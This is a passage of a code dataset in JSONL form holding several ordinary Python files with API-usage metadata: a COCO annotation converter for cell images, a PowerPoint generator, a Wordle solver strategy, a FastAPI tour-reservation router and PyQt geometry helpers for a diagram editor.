"torch.nn.BatchNorm2d", "line_number": 160, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 161, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 162, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 162, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 170, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 228, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 239, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 251, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 251, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 266, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 280, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 289, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.multinomial", "line_number": 292, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 296, "usage_type": "call"}, {"api_name": "torch.nonzero", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 317, "usage_type": "attribute"}, {"api_name": "torch.mean", "line_number": 326, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 327, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 328, "usage_type": "call"}, {"api_name": "torch.multinomial", "line_number": 329, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 333, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.unsqueeze", "line_number": 339, "usage_type": "call"}, {"api_name": "torch.nonzero", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 368, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 370, "usage_type": "attribute"}]}
+{"seq_id": "22664902940", "text": "import os\nimport datetime\n\nfrom pycococreatortools import pycococreatortools\nimport pycocotools\nfrom PIL.Image import Image\nfrom boxx import *\nimport cv2\nimport numpy as np\nimport os, glob\nimport json\nimport os\nimport re\nimport fnmatch\nfrom PIL import Image\nimport numpy as np\n\n\n\n\n\n\nINFO = {\n \"description\": \"Example Dataset\",\n \"url\": \"https://github.com/waspinator/pycococreator\",\n \"version\": \"0.1.0\",\n \"year\": 2018,\n \"contributor\": \"waspinator\",\n \"date_created\": datetime.datetime.utcnow().isoformat(' ')\n}\n\nLICENSES = [\n {\n \"id\": 1,\n \"name\": \"Attribution-NonCommercial-ShareAlike License\",\n \"url\": \"http://creativecommons.org/licenses/by-nc-sa/2.0/\"\n }\n]\n\nCATEGORIES = [\n {\n 'id': 1,\n 'name': 'cell',\n 'supercategory': 'cell',\n },\n]\n\ndef filter_for_jpeg(root, files):\n file_types = ['*.jpeg', '*.jpg', '*.png']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n return files\n\n\ndef filter_for_annotations(root, files, image_filename):\n file_types = ['*.png']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n basename_no_extension = os.path.splitext(os.path.basename(image_filename))[0]\n file_name_prefix = basename_no_extension + '.*'\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n files = [f for f in files if re.match(file_name_prefix, os.path.splitext(os.path.basename(f))[0])]\n return files\n\n\ndef translate(ROOT_DIR,IMAGE_DIR,ANNOTATION_DIR):\n coco_output = {\n \"info\": INFO,\n \"licenses\": LICENSES,\n \"categories\": CATEGORIES,\n \"images\": [],\n \"annotations\": []\n }\n i =0\n image_id = 1\n segmentation_id = 1\n\n # filter for jpeg images\n for root, _, files in os.walk(IMAGE_DIR):\n #所有图片\n image_files = filter_for_jpeg(root, files)\n # tree-image_files\n finish = []\n # go through each image\n for image_filename in image_files:\n image = Image.open(image_filename)\n i+=1\n# image_filename_json = image_filename.split('cell')\n\n# image_filename_json = image_filename_json[0][:-1]+'.png'\n# print(image_filename_json)\n #创建image_info,这个其实就是每张图放进去而不是每个实例\n# if image_filename_json not in finish:\n image_info = pycococreatortools.create_image_info(\n image_id, os.path.basename(image_filename), image.size)\n coco_output[\"images\"].append(image_info)\n# finish.append(image_filename_json)\n \n\n #这方面应该先\n # filter for associated png annotations\n for root, _, files in os.walk(ANNOTATION_DIR):\n annotation_files = filter_for_annotations(root, files, image_filename)\n\n # go through each associated annotation\n for annotation_filename in annotation_files:\n \n annotation_filename_json = annotation_filename.split('cell')\n\n annotation_filename_json = annotation_filename_json[0][:-1]+'.png'\n\n print(\"image_filename:\",image_filename,\"\\nannotation_filename:\",annotation_filename,\"\\n\",\n \"annotation_filename_json:\",annotation_filename_json,\"\\n\")\n \n image_filename_compare = image_filename.split('/')[-1]\n annotation_filename_json_compare = annotation_filename_json.split('/')[-1]\n \n if annotation_filename_json_compare == image_filename_compare:\n print(\"!!!!!\")\n class_id = [x['id'] for x in CATEGORIES if x['name'] in annotation_filename][0]\n\n tree-class_id\n\n category_info = {'id': class_id, 'is_crowd': 'crowd' in image_filename}\n binary_mask = np.asarray(Image.open(annotation_filename)\n .convert('1')).astype(np.uint8)\n\n annotation_info = pycococreatortools.create_annotation_info(\n segmentation_id, image_id, category_info, binary_mask,\n image.size, tolerance=2)\n\n if annotation_info is not None :\n coco_output[\"annotations\"].append(annotation_info)\n\n segmentation_id = segmentation_id + 1\n image_id = image_id + 1\n\n\n\n # with open('{}/instances_train2017.json'.format(ANNOTATION_DIR), 'w') as output_json_file:\n # json.dump(coco_output, output_json_file)\n with open('{}/instances_val2017.json'.format(ANNOTATION_DIR), 'w') as output_json_file:\n json.dump(coco_output, output_json_file)\n print(i)\n\n\n\ndef main():\n\n # ROOT_DIR = '/home/huang/dataset/CRAG_v2/CRAG/train'\n # IMAGE_DIR = os.path.join(ROOT_DIR, \"Images\")\n # ANNOTATION_DIR = os.path.join(ROOT_DIR, \"annotations\")\n\n\n # translate(ROOT_DIR,IMAGE_DIR,ANNOTATION_DIR)\n\n ROOT_DIR = '/home/huang/dataset/CRAG_v2/CRAG/valid'\n IMAGE_DIR = os.path.join(ROOT_DIR, \"Images\")\n ANNOTATION_DIR = os.path.join(ROOT_DIR, \"annotations\")\n\n # print(IMAGE_DIR,ANNOTATION_DIR,'????')\n translate(ROOT_DIR,IMAGE_DIR,ANNOTATION_DIR)\n\n\n# ROOT_DIR = '/home/huang/dataset/CRAG_v2/test_json/annotation'\n# IMAGE_DIR = os.path.join(ROOT_DIR, \"Image\")\n# ANNOTATION_DIR = os.path.join(ROOT_DIR, \"annotations\")\n\n translate(ROOT_DIR,IMAGE_DIR,ANNOTATION_DIR)\n\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "XiaoyuZHK/CRAG-Dataset_Aug_ToCOCO", "sub_path": "CRAGInstance_To_Json.py", "file_name": "CRAGInstance_To_Json.py", "file_ext": "py", "file_size_in_byte": 5787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "fnmatch.translate", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 52, "usage_type": "call"}, {"api_name": "fnmatch.translate", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 62, "usage_type": "call"}, {"api_name": "re.match", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 63, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 80, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 87, "usage_type": "name"}, {"api_name": "pycococreatortools.pycococreatortools.create_image_info", "line_number": 95, "usage_type": "call"}, {"api_name": "pycococreatortools.pycococreatortools", "line_number": 95, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 126, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 126, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 126, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pycococreatortools.pycococreatortools.create_annotation_info", "line_number": 129, "usage_type": "call"}, {"api_name": "pycococreatortools.pycococreatortools", "line_number": 129, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}]}
+{"seq_id": "30773348528", "text": "from pptx import Presentation\nfrom csv_loader import srednia\n\nprs = Presentation()\n\nslide_layout = prs.slide_layouts[1]\n\nslide = prs.slides.add_slide(slide_layout)\nshapes = slide.shapes\n\ntitle_shape = shapes.title\n\nbody_shape = shapes.placeholders[1]\n\ntitle_shape.text = 'Jakis text'\n\ntf = body_shape.text_frame\ntf.text = 'Zawartosc text frame'\n\np = tf.add_paragraph()\np.text = \"Kobiety - srednia wieku\"\np.level = 1\n\np = tf.add_paragraph()\np.text = f\"{srednia()}\"\np.level = 2\n\nprs.save(\"raport.pptx\")\n\n", "repo_name": "jacek-szymborski/bootcamp", "sub_path": "zjazd_4/pptx_przyklad.py", "file_name": "pptx_przyklad.py", "file_ext": "py", "file_size_in_byte": 502, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pptx.Presentation", "line_number": 4, "usage_type": "call"}, {"api_name": "csv_loader.srednia", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "31520708426", "text": "import wordle_dict as wd\nimport logging\nimport log_config # import does logging config\nimport wordle_util as wu\n\nlog = logging.getLogger(__name__)\n\n\nclass WordFrequencyStrategy:\n def __init__(self, dictionary: list[tuple[str, int]] = wd.load_frequency(), exploration_settings: map = None):\n self.dictionary = dictionary\n\n exploration_settings = exploration_settings or {\"first_word\": \"raise\"}\n\n # This is what Dave was using, so for now we're matching that to validate parity with his implementation\n self.forced_first_word = exploration_settings[\"first_word\"]\n\n def next_guess(self):\n if self.forced_first_word:\n guess = self.forced_first_word\n self.forced_first_word = None\n else:\n guess = self.dictionary[0][0] if self.dictionary else None\n\n log.debug(f\"next_guess={guess}\")\n return guess\n\n def accept_result(self, results: list[str], guess: str):\n log.debug(f\"accept_result, word={guess}, result={results}\")\n\n misplaced_letters = wu.count_misplaced_letters(guess, results)\n\n log.debug(\"Misplaced letters: %s\", misplaced_letters)\n\n new_dictionary = []\n for ws_tuple in self.dictionary:\n if wu.is_possible_solution(ws_tuple[0], guess, results, misplaced_letters):\n new_dictionary.append(ws_tuple)\n\n if len(new_dictionary) == len(self.dictionary):\n log.warn(\n f\"Feedback didn't remove any words from consideration. old_size={len(self.dictionary)}, new_size={len(new_dictionary)}\")\n\n self.dictionary = new_dictionary\n", "repo_name": "breischl/wordle_solver", "sub_path": "word_frequency_strategy.py", "file_name": "word_frequency_strategy.py", "file_ext": "py", "file_size_in_byte": 1617, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "wordle_dict.load_frequency", "line_number": 10, "usage_type": "call"}, {"api_name": "wordle_util.count_misplaced_letters", "line_number": 31, "usage_type": "call"}, {"api_name": "wordle_util.is_possible_solution", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "5919674501", "text": "import aiohttp\nfrom fastapi import (\n APIRouter,\n Body,\n Header,\n Depends,\n status,\n Response,\n HTTPException,\n Path\n)\n\nfrom data.pydantic import (\n RegisterTour,\n User,\n BillPayed,\n Tour,\n Bill\n)\n\nfrom exceptions import TourNotEnoughSpace\nfrom tasks import release_tour, add\nfrom config import AUTHORIZATION_URL\nfrom config import TOUR_API\nfrom config import PAYMENT_API\n\nrouter = APIRouter()\n\naiohttp_session = aiohttp.ClientSession()\n\n\n@router.on_event(\"shutdown\")\nasync def close_aiohttp_session():\n await aiohttp_session.close()\n\n\nasync def authorization_header(\n authorization: str = Header(\n ...,\n alias=\"Authorization\",\n title='authorization header',\n description=\"authorization header\"\n )\n):\n return authorization\n\n\nasync def get_user(\n token: str = Depends(authorization_header)\n):\n user = None\n\n key = token.split(\" \")[1]\n\n async with aiohttp_session.post(AUTHORIZATION_URL, json={\n 'key': key\n }) as response:\n data = await response.json()\n\n if response.status == status.HTTP_401_UNAUTHORIZED:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED\n )\n user = User.parse_obj(data)\n\n return user\n\n\n# @router.get('/add/{a}/{b}')\n# async def add_numbers(\n# a: int = Path(...),\n# b: int = Path(...)\n# ):\n# add.delay(a, b)\n\n\n@router.post('/reserve', response_model=Bill)\nasync def reserve_tour(\n register_tour: RegisterTour = Body(\n ...,\n title='register tour data'\n ),\n user: User = Depends(get_user)\n):\n tour: Tour\n\n async with aiohttp_session.patch(\n f\"{TOUR_API}/tour/{register_tour.tour_id}/reserve\",\n json={\n 'count': register_tour.reserve_count\n }) as response:\n data = await response.json()\n\n tour = Tour.parse_obj(data)\n\n if response.status == status.HTTP_406_NOT_ACCEPTABLE:\n raise TourNotEnoughSpace()\n\n async with aiohttp_session.post(\n f\"{PAYMENT_API}/bills\",\n json={\n 'user_id': user.id,\n 'tour_id': register_tour.tour_id,\n 'reserve_count': register_tour.reserve_count,\n 'item_cost': tour.price\n }) as response:\n if response.status != status.HTTP_200_OK:\n raise HTTPException(\n status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,\n detail=\"an error occurred while getting payment info\"\n )\n data = await response.json()\n\n bill = Bill.parse_obj(data)\n\n release_tour.apply_async(\n (bill.id, bill.tour_id, bill.reserve_count),\n count_down=600\n )\n\n return bill\n", "repo_name": "ShAlireza/SADProject", "sub_path": "cart/routers/cart.py", "file_name": "cart.py", "file_ext": "py", "file_size_in_byte": 2763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 27, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 29, "usage_type": "call"}, {"api_name": "fastapi.Header", "line_number": 38, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 49, "usage_type": "call"}, {"api_name": "config.AUTHORIZATION_URL", "line_number": 55, "usage_type": "argument"}, {"api_name": "data.pydantic", "line_number": 58, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 60, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 60, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 61, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 62, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 62, "usage_type": "name"}, {"api_name": "data.pydantic.User.parse_obj", "line_number": 64, "usage_type": "call"}, {"api_name": "data.pydantic", "line_number": 64, "usage_type": "argument"}, {"api_name": "data.pydantic.User", "line_number": 64, "usage_type": "name"}, {"api_name": "data.pydantic.RegisterTour", "line_number": 79, "usage_type": "name"}, {"api_name": "data.pydantic.User", "line_number": 83, "usage_type": "name"}, {"api_name": "fastapi.Body", "line_number": 79, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 83, "usage_type": "call"}, {"api_name": "data.pydantic.Tour", "line_number": 85, "usage_type": "name"}, {"api_name": "config.TOUR_API", "line_number": 88, "usage_type": "name"}, {"api_name": "data.pydantic", "line_number": 92, "usage_type": "name"}, {"api_name": "data.pydantic.Tour.parse_obj", "line_number": 94, "usage_type": "call"}, {"api_name": "data.pydantic", "line_number": 94, "usage_type": "argument"}, {"api_name": "data.pydantic.Tour", "line_number": 94, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_406_NOT_ACCEPTABLE", "line_number": 96, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 96, "usage_type": "name"}, {"api_name": "exceptions.TourNotEnoughSpace", "line_number": 97, "usage_type": "call"}, {"api_name": "config.PAYMENT_API", "line_number": 100, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 107, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 107, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 108, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 109, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 109, "usage_type": "name"}, {"api_name": "data.pydantic", "line_number": 112, "usage_type": "name"}, {"api_name": "data.pydantic.Bill.parse_obj", "line_number": 114, "usage_type": "call"}, {"api_name": "data.pydantic", "line_number": 114, "usage_type": "argument"}, {"api_name": "data.pydantic.Bill", "line_number": 114, "usage_type": "name"}, {"api_name": "tasks.release_tour.apply_async", "line_number": 116, "usage_type": "call"}, {"api_name": "tasks.release_tour", "line_number": 116, "usage_type": "name"}, {"api_name": "data.pydantic.Bill", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "12506233712", "text": "import math\n\nfrom PyQt5.QtCore import QPoint\n\nimport block, arrow, combine\n\n# 点と点\ndef disPointPoint(point1_pos, point2_pos):\n po = point1_pos - point2_pos\n return math.hypot(po.x(), po.y())\n\n# 点と点\ndef nearestPointPoint(point1_pos, point2_pos):\n dis = disPointPoint(point1_pos, point2_pos)\n return dis\n\n# 点と円\ndef nearestPointCircle(point_pos, circle_pos, radius):\n dis = disPointPoint(point_pos, circle_pos)\n\n po = circle_pos + (point_pos - circle_pos) * radius / dis\n return po\n\n# 点と直線\ndef nearestPointLine(point_pos, line_start, line_end):\n po_x = point_pos.x()\n po_y = point_pos.y()\n li_start_x = line_start.x()\n li_start_y = line_start.y()\n li_end_x = line_end.x()\n li_end_y = line_end.y()\n\n if li_start_x == li_end_x: # when vertical line\n small_y = min(li_start_y, li_end_y)\n large_y = max(li_start_y, li_end_y)\n\n if large_y <= po_y:\n return QPoint(li_start_x, large_y)\n elif large_y > po_y and small_y < po_y:\n return QPoint(li_start_x, po_y)\n else:\n return QPoint(li_start_x, small_y)\n\n else: # when horizontal line\n small_x = min(li_start_x, li_end_x)\n large_x = max(li_start_x, li_end_x)\n\n if large_x <= po_x:\n return QPoint(large_x, li_start_y)\n elif large_x > po_x and small_x < po_x:\n return QPoint(po_x, li_start_y)\n else:\n return QPoint(small_x, li_start_y)\n\n# 点とブロック\ndef nearestPointBlock(point_pos, block_start, block_end):\n po_x = point_pos.x()\n po_y = point_pos.y()\n bl_start_x = block_start.x()\n bl_start_y = block_start.y()\n bl_end_x = block_end.x()\n bl_end_y = block_end.y()\n\n pos = []\n\n pos.append(nearestPointLine(point_pos, QPoint(bl_start_x, bl_start_y), QPoint(bl_end_x, bl_start_y)))\n pos.append(nearestPointLine(point_pos, QPoint(bl_end_x, bl_start_y), QPoint(bl_end_x, bl_end_y)))\n pos.append(nearestPointLine(point_pos, QPoint(bl_start_x, bl_end_y), QPoint(bl_end_x, bl_end_y)))\n pos.append(nearestPointLine(point_pos, QPoint(bl_start_x, bl_start_y), QPoint(bl_start_x, bl_end_y)))\n\n dis = []\n for p in pos:\n dis.append(math.hypot(p.x() - po_x, p.y() - po_y))\n\n pos_dis = [pos[0], dis[0]]\n for i in range(len(pos) - 1):\n if pos_dis[1] > dis[i + 1]:\n pos_dis = [pos[i + 1], dis[i + 1]]\n\n return pos_dis\n\n# 点と矢印\ndef nearestPointArrow(point_pos, arrow_way_pos):\n po_x = point_pos.x()\n po_y = point_pos.y()\n\n if len(arrow_way_pos) == 1:\n return [None, None]\n\n pos = []\n\n for i in range(len(arrow_way_pos) - 1):\n ar_pre_p = arrow_way_pos[i]\n ar_post_p = arrow_way_pos[i + 1]\n pos.append(nearestPointLine(point_pos, ar_pre_p, ar_post_p))\n\n dis = []\n for p in pos:\n dis.append(math.hypot(p.x() - po_x, p.y() - po_y))\n\n pos_dis = [pos[0], dis[0]]\n for i in range(len(pos) - 1):\n if pos_dis[1] > dis[i + 1]:\n pos_dis = [pos[i + 1], dis[i + 1]]\n\n return pos_dis\n\n# ブロックと矢印\n#def nearestBlockArrow(block_start, block_end, ar_way_pos):\n# bl_start_x = block_start.x()\n# bl_start_y = block_start.y()\n# bl_end_x = block_end.x()\n# bl_end_y = block_end.y()\n#\n# if ar_way_pos == []:\n# return [None, None]\n# \n# pos = []\n#\n# pos.append(nearestPointLine(way_pos[0], QPoint(bl_start_x, bl_end_y), QPoint(bl_end_x, bl_end_y)))\n# pos.append(nearestPointLine(way_pos[0], QPoint(bl_end_x, bl_start_y), QPoint(bl_end_x, bl_end_y)))\n# pos.append(nearestPointLine(way_pos[-1], QPoint(bl_start_x, bl_end_y), QPoint(bl_end_x, bl_end_y)))\n# pos.append(nearestPointLine(way_pos[-1], QPoint(bl_end_x, bl_start_y), QPoint(bl_end_x, bl_end_y)))\n#\n# dis = []\n# for p in pos:\n# dis.append(math.hypot(p.x() - pos_x, p.y() - pos_y))\n#\n# pos_dis = [pos[0], dis[0]]\n# for i in range(len(pos) - 1):\n# if pos_dis[1] > dis[i + 1]:\n# pos_dis = [pos[i + 1], dis[i + 1]]\n#\n# return pos_dis\n\n# 点と結合\ndef nearestPointCombine(point_pos, combine_pos, radius):\n pos = nearestPointCircle(point_pos, combine_pos, radius)\n dis = disPointPoint(pos, point_pos)\n pos_dis = [pos, dis]\n return pos_dis\n\ndef nearObjPosDis(pos, all_obj, is_blue):\n pos_all = []\n dis_all = []\n obj_all = []\n\n # カーソルと各オブジェクトの最短位置と距離\n for o in all_obj:\n if o.mode == -1:\n continue\n if type(o) == block.Block:\n [tmp_pos, tmp_dis] = nearestPointBlock(pos, o.start_pos, o.end_pos)\n elif type(o) == arrow.Arrow:\n [tmp_pos, tmp_dis] = nearestPointArrow(pos, o.way_pos)\n elif type(o) == combine.Combine:\n [tmp_pos, tmp_dis] = nearestPointCombine(pos, o.pos, o.radius)\n pos_all.append(tmp_pos)\n dis_all.append(tmp_dis)\n obj_all.append(o)\n\n if pos_all == []: # 既存のオブジェクトが無い\n # self.setEndPoint(mouse_pos)\n return [None, None, None]\n\n # 距離が最小の時のdis, pos, objを求める\n min_dis = min(dis_all)\n min_pos = pos_all[dis_all.index(min_dis)]\n min_obj = obj_all[dis_all.index(min_dis)]\n\n\n for o in all_obj:\n # まずは全部青でなくする\n if is_blue == True:\n o.setFrameBlue(False)\n if min_dis < 10: # 距離が十分近かったら\n # そのオブジェクトを青にして選択する\n if is_blue == True:\n min_obj.setFrameBlue(True)\n return [min_obj, min_pos, min_dis]\n else:\n return [None, None, None]\n\ndef nearArrowPosDis(pos, all_obj, is_blue):\n pos_all = []\n dis_all = []\n obj_all = []\n\n # カーソルと各オブジェクトの最短位置と距離\n for o in all_obj:\n if o.mode == -1:\n continue\n if type(o) == arrow.Arrow:\n tmp_pos = o.way_pos[-1]\n tmp_dis = nearestPointPoint(pos, o.way_pos[-1])\n pos_all.append(tmp_pos)\n dis_all.append(tmp_dis)\n obj_all.append(o)\n if type(o) == arrow.Arrow:\n tmp_pos = o.way_pos[0]\n tmp_dis = nearestPointPoint(pos, o.way_pos[0])\n pos_all.append(tmp_pos)\n dis_all.append(tmp_dis)\n obj_all.append(o)\n\n if pos_all == []: # 既存のオブジェクトが無い\n return [None, None, None]\n\n # 距離が最小の時のdis, pos, objを求める\n min_dis = min(dis_all)\n min_pos = pos_all[dis_all.index(min_dis)]\n min_obj = obj_all[dis_all.index(min_dis)]\n\n\n # TODO 矢印全体でなく端点のみ青にする\n for o in all_obj:\n # まずは全部青でなくする\n if is_blue == True:\n o.setFrameBlue(False)\n if min_dis < 10: # 距離が十分近かったら\n # そのオブジェクトを青にして選択する\n if is_blue == True:\n min_obj.setFrameBlue(True)\n if min_pos == min_obj.way_pos[0]: # 最初の点だったら\n po = min_obj.way_pos[0] - min_obj.way_pos[1]\n tmp_pos = min_pos + po * 9 / max(abs(po.x()), abs(po.y()))\n return [min_obj, tmp_pos, min_dis]\n elif min_pos == min_obj.way_pos[-1]: # 最後の点だったら\n po = min_obj.way_pos[-1] - min_obj.way_pos[-2]\n tmp_pos = min_pos + po * 9 / max(abs(po.x()), abs(po.y()))\n return [min_obj, tmp_pos, min_dis]\n else:\n return [None, None, None]\n else:\n return [None, None, None]\n", "repo_name": "takayuki5168/BlockDiagramMaker", "sub_path": "math_util.py", "file_name": "math_util.py", "file_ext": "py", "file_size_in_byte": 7534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "math.hypot", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 53, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 68, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 69, "usage_type": "call"}, {"api_name": "math.hypot", "line_number": 73, "usage_type": "call"}, {"api_name": "math.hypot", "line_number": 99, "usage_type": "call"}, {"api_name": "block.Block", "line_number": 152, "usage_type": "attribute"}, {"api_name": "arrow.Arrow", "line_number": 154, "usage_type": "attribute"}, {"api_name": "combine.Combine", "line_number": 156, "usage_type": "attribute"}, {"api_name": "arrow.Arrow", "line_number": 193, "usage_type": "attribute"}, {"api_name": "arrow.Arrow", "line_number": 199, "usage_type": "attribute"}]}
